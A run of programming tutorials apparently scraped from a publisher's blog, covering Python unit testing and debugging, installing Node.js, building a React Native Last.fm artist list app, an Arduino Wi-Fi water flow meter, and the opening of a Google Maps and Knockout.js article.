by importing the required modules and defining the class: import unittest from calculator.Calculator import Calculator class test_Operation(unittest.TestCase): We will now add two test cases that test the correct handling of errors when operations and values are entered in the incorrect order. This time, we will use the assertRaises function to create a context to test for RuntimeError being raised. In this case, the error must be raised by any of the code within the context. def test_add_value_out_of_order_fails(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_value(5) calc.enter_value(5) calc.evaluate() def test_add_operation_out_of_order_fails(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_operation('add') calc.evaluate() This test is to ensure that the all_clear function works as expected. Note that, here, we have multiple test assertions in the function, and all assertions have to pass for the test to pass. 
def test_all_clear(self): calc = Calculator() calc.enter_value(5) calc.evaluate() self.assertEqual(calc.get_result(), 5) calc.all_clear() self.assertEqual(calc.get_result(), 0) This test ensured that the evaluate() function works as expected and checks the output of a known calculation. Note, here, that we are using the assertAlmostEqual function, which ensures that two numerical variables are equal within a given tolerance, in this case 13 decimal places. def test_evaluate(self): calc = Calculator() calc.enter_value(5.0) calc.enter_operation('multiply') calc.enter_value(2.0) calc.enter_operation('divide') calc.enter_value(5.0) calc.enter_operation('add') calc.enter_value(18.0) calc.enter_operation('subtract') calc.enter_value(5.0) self.assertAlmostEqual(calc.evaluate(), 15.0, 13) self.assertAlmostEqual(calc.get_result(), 15.0, 13) These two tests will test that the errors are handled correctly when the evaluate() function is called, when there are values missing from the input or the input is empty: def test_evaluate_failure_empty(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_operation('add') calc.evaluate() def test_evaluate_failure_missing_value(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_value(5) calc.enter_operation('add') calc.evaluate() That completes the test case for the Calculator class. Note that we have only used a small subset of the available test assertions over our two test classes. A full list of all the test assertions is available in the unittest module documentation at https://docs.python.org/2/library/unittest.html#test-cases. Once all the tests are written, they can be executed using the following command in the directory containing both the calculator and tests directories: python -m unittest discover -v Here, we have the unit test framework discover all the tests automatically (which is why following the expected naming convention of prefixing names with "test" is important). We also request verbose output with the -v parameter, which shows all the tests executed and their results, as shown in the following screenshot: Summary In this article, we looked at how the PDB tool can be used to find faults in Python code and applications. We also looked at using the logging module to have Python code output a log file during execution and how this can make debugging the failures easier, as well as automated unit testing for portions of the application. Resources for Article: Further resources on this subject: Basic Image Processing[article] IRemote Desktop to Your Pi from Everywhere[article] Scraping the Data [article]
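To tie the techniques in this article together in one runnable file, here is a small, self-contained sketch. It is not part of the book's calculator project; the file name standalone_debug_demo.py and the divide() function are invented for this illustration. It shows dropping into PDB programmatically with pdb.set_trace() instead of setting a breakpoint from the shell, and filtering log output by severity with a named logger.
# standalone_debug_demo.py
import logging
import pdb


def divide(a, b):
    log = logging.getLogger(__name__)
    log.debug("Dividing %f by %f", a, b)
    if b == 0:
        # Pause here and open a PDB shell whenever a zero divisor is seen.
        pdb.set_trace()
    return a / b


if __name__ == "__main__":
    # INFO and above are printed; the debug() call above is filtered out.
    logging.basicConfig(level=logging.INFO,
                        format="%(levelname)s:%(name)s:%(message)s")
    logging.getLogger(__name__).info("Result: %f", divide(10.0, 2.0))
    logging.shutdown()
Running python standalone_debug_demo.py prints only the INFO line; changing the level to logging.DEBUG also shows the debug message, and calling divide() with a zero divisor drops you into the same PDB shell described earlier.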

Learning Node.js for Mobile Application Development

Packt
23 Sep 2015
5 min read
In Learning Node.js for Mobile Application Development by Christopher Svanefalk and Stefan Buttigieg, the overarching goal is to give you the tools and know-how to install Node.js on multiple OS platforms and to verify the installation. After reading this article, you will know how to install, configure, and use the fundamental software components. You will also have a good understanding of why these tools are appropriate for developing modern applications. (For more resources related to this topic, see here.)
Why Node.js?
Modern apps have several requirements that cannot be provided by the app itself, such as central data storage, communication routing, and user management. In order to provide such services, apps rely on an external software component known as a backend. The backend we will use for this is Node.js, a powerful but strange beast in its category. Node.js is known for being both reliable and highly performing. Node.js comes with its own package management system, NPM (Node Package Manager), through which you can easily install, remove, and manage packages for your project.
What this article covers
This article covers the installation of Node.js on multiple OS platforms and how to verify the installation.
The installation
Node.js is delivered as a set of JavaScript libraries, executing on a C/C++ runtime that is built around the Google V8 JavaScript Engine. The two come bundled together for most major operating systems, and we will look at the specifics of installing it. The Google V8 JavaScript Engine is the same JavaScript engine that is used in the Chrome browser, built for speed and efficiency.
Windows
For Windows, there is a dedicated MSI wizard that can be used to install Node.js, which can be downloaded from the project's official website. To do so, go to the main page, navigate to Downloads, and then select Windows Installer. After it is downloaded, run the MSI, follow the steps given to select the installation options, and conclude the install. Keep in mind that you will need to restart your system in order to make the changes effective.
Linux
Most major Linux distributions provide convenient installs of Node.js through their own package management systems. However, it is important to keep in mind that for many of them, NPM will not come bundled with the main Node.js package. Rather, it will be provided as a separate package. We will show how to install both in the following section.
Ubuntu/Debian
Open a terminal and issue sudo apt-get update to make sure that you have the latest package listings. After this, issue sudo apt-get install nodejs npm in order to install both Node.js and NPM in one swoop.
Fedora/RHEL/CentOS
On Fedora 18 or later, open a terminal and issue sudo yum install nodejs npm. The system will perform the full setup for you. If you are running RHEL or CentOS, you will need to enable the optional EPEL repository. This can be done in conjunction with the install process, so that you do not need to do it again while upgrading, by issuing the sudo yum install nodejs npm --enablerepo=epel command.
Verifying your installation
Now that we have finished the install, let's do a sanity check and make sure that everything works as expected. To do so, we can use the Node.js shell, which is an interactive runtime environment that is used to execute JavaScript code. To open it, first open a terminal, and then issue the following on it:
node
This will start the interpreter, which will appear as a shell, with the input line starting with the > sign.
Once you are in it, type the following:
console.log("Hello world!");
Then, press Enter. The Hello world! phrase will appear on the next line. Congratulations, your system is now set up to run Node.js!
Mac OS X
For Mac OS X, you can find a ready-to-install PKG file by going to www.nodejs.org, navigating to Downloads, and selecting the Mac OS X Installer option. Otherwise, you can click on Install, and your package file will automatically be downloaded, as shown in the following screenshot:
Once you have downloaded the file, run it and follow the instructions on the screen. It is recommended that you keep all the offered default settings, unless there are compelling reasons for you to change something with regard to your specific machine.
Verifying your installation for Mac OS X
After the install finishes, open a terminal and start the Node.js shell by issuing the following command:
node
This will start the interactive node shell where you can execute JavaScript code. To make sure that everything works, try issuing the following command to the interpreter:
console.log("Hello world!");
After pressing Enter, the Hello world! phrase will appear on your screen. Congratulations, Node.js is all set up and good to go!
Who this article is written for
This article is intended for web developers of all levels of expertise who want to dive deep into cross-platform mobile application development without going through the pains of understanding the languages and native frameworks that form an integral part of developing for different mobile platforms. This article will provide the readers with the necessary basic idea to develop mobile applications with near-native functionality and help them understand the process of developing a successful cross-platform mobile application.
Summary
In this article, we learned the different techniques that can be used to install Node.js across different platforms. Read Learning Node.js for Mobile Application Development to dive into cross-platform mobile application development. The following are some other related titles:
Node.js Design Patterns
Web Development with MongoDB and Node.js
Deploying Node.js
Node Security
Resources for Article:
Further resources on this subject: Welcome to JavaScript in the full stack [article] Introduction and Composition [article] Deployment and Maintenance [article]
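Beyond the interactive shell check above, a slightly more complete smoke test (not from the book) is to serve an HTTP response. The file name hello-server.js and port 3000 are arbitrary choices for this sketch.
// hello-server.js
var http = require('http');

// Respond to every request with a plain-text greeting.
var server = http.createServer(function (request, response) {
  response.writeHead(200, { 'Content-Type': 'text/plain' });
  response.end('Hello from Node.js!\n');
});

server.listen(3000, function () {
  console.log('Server listening on http://localhost:3000');
});
Run it with node hello-server.js and open http://localhost:3000 in a browser; if the greeting appears, both the runtime and its networking stack are working.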

Introduction to React Native

Eugene Safronov
23 Sep 2015
7 min read
React is an open-sourced JavaScript library made by Facebook for building UI applications. The project has a strong emphasis on the component-based approach and utilizes the full power of JavaScript for constructing all elements. The React Native project was introduced during the first React conference in January 2015. It allows you to build native mobile applications using the same concepts from React. In this post I am going to explain the main building blocks of React Native through the example of an iOS demo application. I assume that you have previous experience in writing web applications with React. Setup Please go through getting started section on the React Native website if you would like to build an application on your machine. Quick start When all of the necessary tools are installed, let's initialize the new React application with the following command: react-native init LastFmTopArtists After the command fetches the code and the dependencies, you can open the new project (LastFmTopArtists/LastFmTopArtists.xcodeproj) in Xcode. Then you can build and run the app with cmd+R. You will see a similar screen on the iOS simulator: You can make changes in index.ios.js, then press cmd+R and see instant changes in the simulator. Demo app In this post I will show you how to build a list of popular artists using the Last.fm api. We will display them with help of ListView component and redirect on the artist page using WebView. First screen Let's start with adding a new screen into our application. For now it will contain dump text. Create file ArtistListScreen with the following code: var React = require('react-native'); var { ListView, StyleSheet, Text, View, } = React; class ArtistListScreen extendsReact.Component { render() { return ( <View style={styles.container}> <Text>Artist list would be here</Text> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: 'white', marginTop: 64 } }) module.exports = ArtistListScreen; Here are some things to note: I declare react components with ES6 Classes syntax. ES6 Destructuring assignment syntax is used for React objects declaration. FlexBox is a default layout system in React Native. Flex values can be either integers or doubles, indicating the relative size of the box. So, when you have multiple elements they will fill the relative proportion of the view based on their flex value. ListView is declared but will be used later. From index.ios.js we call ArtistListScreen using NavigatorIOS component: var React = require('react-native'); var ArtistListScreen = require('./ArtistListScreen'); var { AppRegistry, NavigatorIOS, StyleSheet } = React; var LastFmArtists = React.createClass({ render: function() { return ( <NavigatorIOS style={styles.container} initialRoute={{ title: "last.fm Top Artists", component: ArtistListScreen }} /> ); } }); var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: 'white', }, }); Switch to iOS Simulator, refresh with cmd+R and you will see: ListView After we have got the empty screen, let's render some mock data in a ListView component. This component has a number of performance improvements such as rendering of only visible elements and removing which are off screen. 
The new version of ArtistListScreen looks like the following: class ArtistListScreen extendsReact.Component { constructor(props) { super(props) this.state = { isLoading: false, dataSource: newListView.DataSource({ rowHasChanged: (row1, row2) => row1 !== row2 }) } } componentDidMount() { this.loadArtists(); } loadArtists() { this.setState({ dataSource: this.getDataSource([{name: 'Muse'}, {name: 'Radiohead'}]) }) } getDataSource(artists: Array<any>): ListView.DataSource { returnthis.state.dataSource.cloneWithRows(artists); } renderRow(artist) { return ( <Text>{artist.name}</Text> ); } render() { return ( <View style={styles.container}> <ListView dataSource={this.state.dataSource} renderRow={this.renderRow.bind(this)} automaticallyAdjustContentInsets={false} /> </View> ); } } Side notes: The DataSource is an interface that ListView is using to determine which rows have changed over the course of updates. ES6 constructor is an analog of getInitialState. The end result of the changes: Api token The Last.fm web api is free to use but you will need a personal api token in order to access it. At first it is necessary to join Last.fm and then get an API account. Fetching real data I assume you have successfully set up the API account. Let's call a real web service using fetch API: const API_KEY='put token here'; const API_URL = 'http://ws.audioscrobbler.com/2.0/?method=geo.gettopartists&country=ukraine&format=json&limit=40'; const REQUEST_URL = API_URL + '&api_key=' + API_KEY; loadArtists() { this.setState({ isLoading: true }); fetch(REQUEST_URL) .then((response) => response.json()) .catch((error) => { console.error(error); }) .then((responseData) => { this.setState({ isLoading: false, dataSource: this.getDataSource(responseData.topartists.artist) }) }) .done(); } After a refresh, the iOS simulator should display: ArtistCell Since we have real data, it is time to add artist's images and rank them on the display. Let's move artist cell display logic into separate component ArtistCell: 'use strict'; var React = require('react-native'); var { Image, View, Text, TouchableHighlight, StyleSheet } = React; class ArtistCell extendsReact.Component { render() { return ( <View> <View style={styles.container}> <Image source={{uri: this.props.artist.image[2]["#text"]}} style={styles.artistImage} /> <View style={styles.rightContainer}> <Text style={styles.rank}>## {this.props.artist["@attr"].rank}</Text> <Text style={styles.name}>{this.props.artist.name}</Text> </View> </View> <View style={styles.separator}/> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, flexDirection: 'row', justifyContent: 'center', alignItems: 'center', padding: 5 }, artistImage: { height: 84, width: 126, marginRight: 10 }, rightContainer: { flex: 1 }, name: { textAlign: 'center', fontSize: 14, color: '#999999' }, rank: { textAlign: 'center', marginBottom: 2, fontWeight: '500', fontSize: 16 }, separator: { height: 1, backgroundColor: '#E3E3E3', flex: 1 } }) module.exports = ArtistCell; Changes in ArtistListScreen: // declare new component var ArtistCell = require('./ArtistCell'); // use it in renderRow method: renderRow(artist) { return ( <ArtistCell artist={artist} /> ); } Press cmd+R in iOS Simulator: WebView The last piece of the application would be to open a web page by clicking in ListView. 
Declare new component WebView: 'use strict'; var React = require('react-native'); var { View, WebView, StyleSheet } = React; class Web extendsReact.Component { render() { return ( <View style={styles.container}> <WebView url={this.props.url}/> </View> ); } } var styles = StyleSheet.create({ container: { flex: 1, backgroundColor: '#F6F6EF', flexDirection: 'column', }, }); Web.propTypes = { url: React.PropTypes.string.isRequired }; module.exports = Web; Then by using TouchableHighlight we will call onOpenPage from ArtistCell: class ArtistCell extendsReact.Component { render() { return ( <View> <TouchableHighlight onPress={this.props.onOpenPage} underlayColor='transparent'> <View style={styles.container}> <Image source={{uri: this.props.artist.image[2]["#text"]}} style={styles.artistImage} /> <View style={styles.rightContainer}> <Text style={styles.rank}>## {this.props.artist["@attr"].rank}</Text> <Text style={styles.name}>{this.props.artist.name}</Text> </View> </View> </TouchableHighlight> <View style={styles.separator}/> </View> ); } } Finally open web page from ArtistListScreen component: // declare new component var WebView = require('WebView'); class ArtistListScreen extendsReact.Component { // will be called on touch from ArtistCell openPage(url) { this.props.navigator.push({ title: 'Web View', component: WebView, passProps: {url} }); } renderRow(artist) { return ( <ArtistCell artist={artist} // specify artist's url on render onOpenPage={this.openPage.bind(this, artist.url)} /> ); } } Now a touch on any cell in ListView will load a web page for selected artist: Conclusion You can explore source code of the app on Github repo. For me it was a real fun to play with React Native. I found debugging in Chrome and error stack messages extremely easy to work with. By using React's component-based approach you can build complex UI without much effort. I highly recommend to explore this technology for rapid prototyping and maybe for your next awesome project. Useful links Building a flashcard app with React Native Examples of React Native apps React Native Videos Video course on React Native Want more JavaScript? Visit our dedicated page here. About the author Eugene Safronov is a software engineer with a proven record of delivering high quality software. He has an extensive experience building successful teams and adjusting development processes to the project’s needs. His primary focuses are Web (.NET, node.js stacks) and cross-platform mobile development (native and hybrid). He can be found on Twitter @sejoker.
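Going back to the demo application above: one small gap is that ArtistListScreen tracks isLoading in its state but never renders anything while the fetch is in flight. The following component is an illustrative addition, not part of the original post; its name, text, and styling are invented, and ArtistListScreen's render() could return it when this.state.isLoading is true.
'use strict';

var React = require('react-native');
var {
  StyleSheet,
  Text,
  View
} = React;

// Shown in place of the ListView while the last.fm request is in progress.
class LoadingPlaceholder extends React.Component {
  render() {
    return (
      <View style={styles.container}>
        <Text style={styles.message}>Loading top artists...</Text>
      </View>
    );
  }
}

var styles = StyleSheet.create({
  container: {
    flex: 1,
    justifyContent: 'center',
    alignItems: 'center',
    backgroundColor: 'white'
  },
  message: {
    fontSize: 16,
    color: '#999999'
  }
});

module.exports = LoadingPlaceholder;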

Internet Connected Smart Water Meter

Packt
22 Sep 2015
13 min read
In this article by Pradeeka Seneviratne, author of the book Internet of Things with Arduino Blueprints, we see that for many years, and even now, water meter readings have been collected manually. To do this, a person has to visit the location where the water meter is installed. In this article, we learn how to make a smart water meter with an LCD screen that has the ability to connect to the Internet wirelessly and serve meter readings to the utility company as well as the consumer. (For more resources related to this topic, see here.)
In this article, we will:
Learn about water flow meters and their basic operation
Learn how to mount and plumb a water flow meter to the pipeline
Read and count water flow sensor pulses
Calculate water flow rate and volume
Learn about LCD displays and connecting them to Arduino
Convert a water flow meter to a simple web server and serve meter readings over the Internet
Prerequisites
The following are the prerequisites:
One Arduino UNO board (the latest version is REV 3)
One Arduino Wi-Fi Shield (the latest version is REV 3)
One Adafruit Liquid Flow Meter or a similar one
One Hitachi HD44780 driver-compatible LCD screen (16x2)
One 10K ohm resistor
One 10K ohm potentiometer
A few jumper wires with male and female headers (https://www.sparkfun.com/products/9140)
Water Flow Meters
The heart of a water flow meter consists of a Hall effect sensor that outputs pulses for magnetic field changes. Inside the housing, there is a small pinwheel with a permanent magnet attached. When the water flows through the housing, the pinwheel begins to spin, and the magnet attached to it passes very close to the Hall effect sensor in every cycle. The Hall effect sensor is covered with a separate plastic housing to protect it from the water. The result is an electric pulse that transitions from low voltage to high voltage, or high voltage to low voltage, depending on the attached permanent magnet's polarity. The resulting pulse can be read and counted using Arduino. For this project, we will be using the Adafruit Liquid Flow Meter. You can visit the product page at http://www.adafruit.com/products/828. The following image shows the Adafruit Liquid Flow Meter (this image is taken from http://www.adafruit.com/products/828); the pinwheel is attached inside the water flow meter.
A little bit about plumbing
Typically, the direction of the water flow is indicated by an arrow mark on top of the water flow meter's enclosure. Also, you can mount the water flow meter either horizontally or vertically according to its specifications. Some water flow meters can be mounted both horizontally and vertically. You can install your water flow meter to a half-inch pipeline using normal BSP pipe connectors. The outer diameter of the connector is 0.78" and the inner thread size is half an inch. The water flow meter has threaded ends on both sides. Connect the threaded side of the PVC connectors to both ends of the water flow meter. Use thread seal tape to seal the connection, and then connect the other ends to an existing half-inch pipeline using PVC pipe glue or solvent cement. Make sure to connect the water flow meter with the pipeline in the correct direction; see the arrow mark on top of the water flow meter for the flow direction.
BSP pipeline connector made of PVC
Securing the connection between the water flow meter and the BSP pipe connector using thread seal tape
PVC solvent cement used to secure the connection between the pipeline and the BSP pipe connector
Wiring the water flow meter with Arduino
The water flow meter that we are using with this project has three wires, which are as follows:
The red wire indicates the positive terminal
The black wire indicates the negative terminal
The yellow wire indicates the DATA terminal
All three wire ends are connected to a JST connector. Always refer to the datasheet before connecting them to the microcontroller and the power source. Use jumper wires with male and female headers as follows:
Connect the positive terminal of the water flow meter to Arduino 5V.
Connect the negative terminal of the water flow meter to Arduino GND.
Connect the DATA terminal of the water flow meter to Arduino digital pin 2 through a 10K ohm resistor.
You can directly power the water flow sensor from Arduino, since most residential-type water flow sensors operate under 5V and consume a very low amount of current. Read the product manual for more information about the supply voltage and supply current range to save your Arduino from high current consumption by the water flow sensor. If your water flow sensor requires a supply current of more than 200 mA or a supply voltage of more than 5V to function correctly, use a separate power source with it. The following image illustrates jumper wires with male and female headers.

Reading pulses
The water flow meter outputs digital pulses according to the amount of water flowing through it, and these pulses can be detected and counted using Arduino. According to the datasheet, the water flow meter that we are using for this project will generate approximately 450 pulses per litre. So, 1 pulse approximately equals [1000 ml / 450 pulses] 2.22 ml. These values can differ depending on the speed of the water flow and the mounting orientation. Arduino can read the digital pulses generated by the water flow meter through the DATA line.

Rising edge and falling edge
There are two types of pulses, which are as follows:
Positive-going pulse: In an idle state, the logic level is normally LOW. It goes to the HIGH state, stays at the HIGH state for time t, and comes back to the LOW state.
Negative-going pulse: In an idle state, the logic level is normally HIGH. It goes to the LOW state, stays at the LOW state for time t, and comes back to the HIGH state.
The rising edge and falling edge of a pulse are vertical. The transition from the LOW state to the HIGH state is called the rising edge, and the transition from the HIGH state to the LOW state is called the falling edge. You can capture digital pulses using either the rising edge or the falling edge, and in this project, we will be using the rising edge.

Reading and counting pulses with Arduino
In the previous section, you attached the water flow meter to Arduino. The pulse can be read by digital pin 2, and interrupt 0 is attached to digital pin 2. The following sketch counts pulses per second and displays them on the Arduino Serial Monitor. Using the Arduino IDE, upload the following sketch into your Arduino board:

int pin = 2;
volatile int pulse;
const int pulses_per_litre = 450;

void setup()
{
  Serial.begin(9600);
  pinMode(pin, INPUT);
  attachInterrupt(0, count_pulse, RISING);
}

void loop()
{
  pulse = 0;
  interrupts();
  delay(1000);
  noInterrupts();

  Serial.print("Pulses per second: ");
  Serial.println(pulse);
}

void count_pulse()
{
  pulse++;
}

Calculating the water flow rate
The water flow rate is the amount of water flowing at a given time, and it can be expressed in gallons per second or litres per second.
The number of pulses generated per litre of water flowing through the sensor can be found in the water flow sensor's specification sheet; let's call it m. You can count the number of pulses generated by the sensor per second; let's call it n. Thus, the water flow rate R can be expressed as follows:

R = n / m (litres per second)

Also, you can calculate the water flow rate in litres per minute as follows:

R = (n / m) x 60 (litres per minute)

For example, if your water flow sensor generates 450 pulses for one litre of water flowing through it, and you get 10 pulses for the first second, then the water flow rate is 10/450 = 0.022 litres per second, or 0.022 * 1000 = 22 millilitres per second.

Using your Arduino IDE, upload the following sketch into your Arduino board. It will output the water flow rate in litres per second on the Arduino Serial Monitor:

int pin = 2;
volatile int pulse;
const int pulses_per_litre = 450;

void setup()
{
  Serial.begin(9600);
  pinMode(pin, INPUT);
  attachInterrupt(0, count_pulse, RISING);
}

void loop()
{
  pulse = 0;
  interrupts();
  delay(1000);
  noInterrupts();

  Serial.print("Pulses per second: ");
  Serial.println(pulse);

  // Cast to float so that pulse counts below 450 do not truncate to zero
  Serial.print("Water flow rate: ");
  Serial.print((float) pulse / pulses_per_litre);
  Serial.println(" litres per second");
}

void count_pulse()
{
  pulse++;
}

Calculating water flow volume
The water flow volume can be calculated by adding up all the per-second flow rates, and it can be expressed as follows:

Volume = ∑ Flow Rates

The following Arduino sketch will calculate and output the total water volume since startup. Upload the sketch into your Arduino board using the Arduino IDE:

int pin = 2;
volatile int pulse;
float volume = 0;
float flow_rate = 0;
const int pulses_per_litre = 450;

void setup()
{
  Serial.begin(9600);
  pinMode(pin, INPUT);
  attachInterrupt(0, count_pulse, RISING);
}

void loop()
{
  pulse = 0;
  interrupts();
  delay(1000);
  noInterrupts();

  Serial.print("Pulses per second: ");
  Serial.println(pulse);

  // Cast to float to avoid integer division truncating the flow rate to zero
  flow_rate = (float) pulse / pulses_per_litre;
  Serial.print("Water flow rate: ");
  Serial.print(flow_rate);
  Serial.println(" litres per second");

  // Keep accumulating the volume; it is not reset here, so it holds the total since startup
  volume = volume + flow_rate;
  Serial.print("Volume: ");
  Serial.print(volume);
  Serial.println(" litres");
}

void count_pulse()
{
  pulse++;
}

To measure the water flow rate and volume accurately, the water flow meter will need careful calibration. The sensor inside the water flow meter is not a precision sensor, and the pulse rate does vary a bit depending on the flow rate, fluid pressure, and sensor orientation.
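If you want to double-check the arithmetic away from the hardware, the following short Python script (not part of the original Arduino project) reproduces the flow rate and volume calculations on a PC. It assumes the datasheet figure of 450 pulses per litre used throughout this article.

# Quick sanity check of the flow-rate arithmetic on a PC.
# Assumes the datasheet figure of 450 pulses per litre.
PULSES_PER_LITRE = 450

def flow_rate_lps(pulses_per_second, pulses_per_litre=PULSES_PER_LITRE):
    """Flow rate in litres per second for a given per-second pulse count."""
    return pulses_per_second / pulses_per_litre

def total_volume(pulse_counts, pulses_per_litre=PULSES_PER_LITRE):
    """Total volume in litres for a list of per-second pulse counts."""
    return sum(pulse_counts) / pulses_per_litre

if __name__ == "__main__":
    # 10 pulses in one second -> roughly 0.022 l/s, matching the worked example above
    print(round(flow_rate_lps(10), 3))
    # One minute of readings at 450 pulses per second -> 60 litres in total
    print(total_volume([450] * 60))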
Adding an LCD screen to the water meter
You can add an LCD screen to your water meter to display readings, rather than displaying them on the Arduino Serial Monitor. You can then disconnect your water meter from the computer after uploading the sketch onto your Arduino. Using a Hitachi HD44780 driver-compatible LCD screen and the Arduino LiquidCrystal library, you can easily integrate it with your water meter. Typically, this type of LCD screen has 16 interface connectors. The display has 2 rows and 16 columns, so each row can display up to 16 characters.

Wire your LCD screen with Arduino as shown in the preceding diagram, and use the 10K potentiometer to control the contrast of the LCD screen. Perform the following steps to connect your LCD screen to your Arduino:
LCD RS pin to digital pin 8
LCD Enable pin to digital pin 7
LCD D4 pin to digital pin 6
LCD D5 pin to digital pin 5
LCD D6 pin to digital pin 4
LCD D7 pin to digital pin 3
Wire a 10K pot to +5V and GND, with its wiper (output) to the LCD screen's VO pin (pin 3).

Now, upload the following sketch into your Arduino board using the Arduino IDE, and then remove the USB cable from your computer. Make sure that water is flowing through the water meter and press the Arduino reset button. You can see the number of pulses per second, the water flow rate per second, and the total water volume since startup displayed on the LCD screen.

#include <LiquidCrystal.h>

int pin = 2;
volatile int pulse;
float volume = 0;
float flow_rate = 0;
const int pulses_per_litre = 450;

// initialize the library with the numbers of the interface pins
LiquidCrystal lcd(8, 7, 6, 5, 4, 3);

void setup()
{
  Serial.begin(9600);
  pinMode(pin, INPUT);
  attachInterrupt(0, count_pulse, RISING);

  // set up the LCD's number of columns and rows:
  lcd.begin(16, 2);
  // Print a message to the LCD.
  lcd.print("Welcome");
}

void loop()
{
  pulse = 0;
  interrupts();
  delay(1000);
  noInterrupts();

  lcd.setCursor(0, 0);
  lcd.print("Pulses/s: ");
  lcd.print(pulse);

  // Cast to float to avoid integer division truncating the flow rate to zero
  flow_rate = (float) pulse / pulses_per_litre;
  lcd.setCursor(0, 1);
  lcd.print(flow_rate, 2);  // two decimal places fit the 16x2 display
  lcd.print(" l/s");

  // Keep accumulating the volume since startup
  volume = volume + flow_rate;
  lcd.setCursor(8, 1);      // column 8 of the second row
  lcd.print(volume, 2);
  lcd.print(" l");
}

void count_pulse()
{
  pulse++;
}

Converting your water meter to a web server
In the previous steps, you learned how to display your water flow sensor's readings and calculate the water flow rate and total volume on the Arduino Serial Monitor. In this step, we integrate a simple web server with the water flow sensor so that you can read the sensor remotely. You can make a wireless web server with the Arduino Wi-Fi shield, or an Ethernet-connected web server with the Arduino Ethernet shield. Perform the following steps:
Remove all the wires you connected to your Arduino in the previous sections of this article.
Stack the Arduino Wi-Fi shield on the Arduino board using wire-wrap headers. Make sure the Wi-Fi shield is properly seated on the Arduino board.
Now, reconnect the wires from the water flow sensor to the Wi-Fi shield. Use the same pin numbers as in the previous steps.
Connect a 9V DC power supply to the Arduino board.
Connect your Arduino to your PC using the USB cable and upload the following sketch. Once the upload is complete, remove the USB cable from the water flow meter.
Upload the following Arduino sketch into your Arduino board using the Arduino IDE:

#include <SPI.h>
#include <WiFi.h>

char ssid[] = "yourNetwork";
char pass[] = "secretPassword";
int keyIndex = 0;

int pin = 2;
volatile int pulse;
float volume = 0;
float flow_rate = 0;
const int pulses_per_litre = 450;

int status = WL_IDLE_STATUS;
WiFiServer server(80);

void setup()
{
  Serial.begin(9600);
  while (!Serial) {
    ;
  }

  // Set up the flow sensor input and interrupt, as in the previous sketches,
  // so that count_pulse() actually gets called
  pinMode(pin, INPUT);
  attachInterrupt(0, count_pulse, RISING);

  if (WiFi.status() == WL_NO_SHIELD) {
    Serial.println("WiFi shield not present");
    while (true);
  }

  // attempt to connect to Wifi network:
  while (status != WL_CONNECTED) {
    Serial.print("Attempting to connect to SSID: ");
    Serial.println(ssid);
    status = WiFi.begin(ssid, pass);
    delay(10000);
  }

  server.begin();
}

void loop()
{
  WiFiClient client = server.available();
  if (client) {
    Serial.println("new client");
    boolean currentLineIsBlank = true;
    while (client.connected()) {
      if (client.available()) {
        char c = client.read();
        Serial.write(c);
        // an HTTP request ends with a blank line
        if (c == '\n' && currentLineIsBlank) {
          client.println("HTTP/1.1 200 OK");
          client.println("Content-Type: text/html");
          client.println("Connection: close");
          client.println("Refresh: 5");
          client.println();
          client.println("<!DOCTYPE HTML>");
          client.println("<html>");
          if (WiFi.status() != WL_CONNECTED) {
            client.println("Couldn't get a wifi connection");
            while (true);
          }
          else {
            // print meter readings on the web page
            pulse = 0;
            interrupts();
            delay(1000);
            noInterrupts();

            client.print("Pulses per second: ");
            client.println(pulse);

            // Cast to float to avoid integer division truncating the flow rate to zero
            flow_rate = (float) pulse / pulses_per_litre;
            client.print("Water flow rate: ");
            client.print(flow_rate);
            client.println(" litres per second");

            // Keep accumulating the volume since startup
            volume = volume + flow_rate;
            client.print("Volume: ");
            client.print(volume);
            client.println(" litres");
            // end
          }
          client.println("</html>");
          break;
        }
        if (c == '\n') {
          currentLineIsBlank = true;
        }
        else if (c != '\r') {
          currentLineIsBlank = false;
        }
      }
    }
    delay(1);
    client.stop();
    Serial.println("client disconnected");
  }
}

void count_pulse()
{
  pulse++;
}

Open the water valve and make sure that water flows through the meter. Click on the RESET button on the Wi-Fi shield. In your web browser, type your Wi-Fi shield's IP address and press Enter. You can see your water flow sensor's flow rate and total volume on the web page. The page refreshes every 5 seconds to display the updated information.

Summary
In this article, you gained hands-on experience and knowledge about water flow sensors, counting pulses, and calculating and displaying flow rate and volume. Finally, you made a simple web server to allow users to read the water meter through the Internet. You can apply this to any type of liquid, but make sure to select the correct flow sensor, because some liquids react chemically with the material the sensor is made of. You can search on Google to find out which flow sensors support your preferred liquid type.

Resources for Article:
Further resources on this subject:
Getting Started with Arduino [article]
Arduino Development [article]
Prototyping Arduino Projects using Python [article]
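As a convenience, you can also poll the meter from a PC instead of a browser. The following Python snippet is a hedged illustration and is not part of the original project: the IP address is a placeholder for whatever address your Wi-Fi shield reports, and the simple text matching assumes the plain HTML page produced by the sketch above.

from urllib.request import urlopen

METER_URL = "http://192.168.1.50/"  # placeholder: replace with your Wi-Fi shield's IP address

def read_meter(url=METER_URL):
    """Fetch the meter page served by the Arduino and return its raw text."""
    with urlopen(url, timeout=10) as response:
        return response.read().decode("utf-8", errors="replace")

if __name__ == "__main__":
    page = read_meter()
    for line in page.splitlines():
        # The sketch prints one reading per line, e.g. "Water flow rate: 0.02 litres per second"
        if "Pulses per second" in line or "Water flow rate" in line or "Volume" in line:
            print(line.strip())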


Using Google Maps APIs with Knockout.js

Packt
22 Sep 2015
7 min read
In this article by Adnan Jaswal, the author of the book KnockoutJS by Example, we will render a map in the application and allow users to place markers on it. The users will also be able to get directions between two addresses, both as a description and as a route on the map. (For more resources related to this topic, see here.)

Placing markers on the map
This feature is about placing markers on the map for the selected addresses. To implement this feature, we will:
Update the address model to hold the marker
Create a method to place a marker on the map
Create a method to remove an existing marker
Register subscribers to trigger the removal of the existing markers when an address changes
Update the module to add a marker to the map

Let's get started by updating the address model. Open the MapsApplication module and locate the AddressModel variable. Add an observable to this model to hold the marker, like this:

/* generic model for address */
var AddressModel = function() {
    this.marker = ko.observable();
    this.location = ko.observable();
    this.streetNumber = ko.observable();
    this.streetName = ko.observable();
    this.city = ko.observable();
    this.state = ko.observable();
    this.postCode = ko.observable();
    this.country = ko.observable();
};

Next, we create a method that will create and place the marker on the map. This method should take the location and the address model as parameters. The method will also store the marker in the address model. Use the google.maps.Marker class to create and place the marker. Our implementation of this method looks similar to this:

